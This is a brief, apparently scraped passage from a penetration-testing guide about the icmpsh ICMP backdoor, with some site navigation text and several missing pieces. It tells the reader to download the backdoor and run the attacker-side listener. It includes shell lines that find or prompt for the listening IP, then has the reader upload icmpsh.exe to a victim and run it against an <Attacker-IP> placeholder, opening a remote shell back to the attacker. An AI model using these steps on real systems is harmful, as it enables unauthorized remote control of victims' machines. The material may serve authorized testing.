Physical attacks
Mobile Apps Pentesting


Download the backdoor from:

Client side

Execute the script:

If you get some error, try to change the lines:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')


echo Please insert the IP where you want to listen
read IP

Victim Side

Upload icmpsh.exe to the victim and execute:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128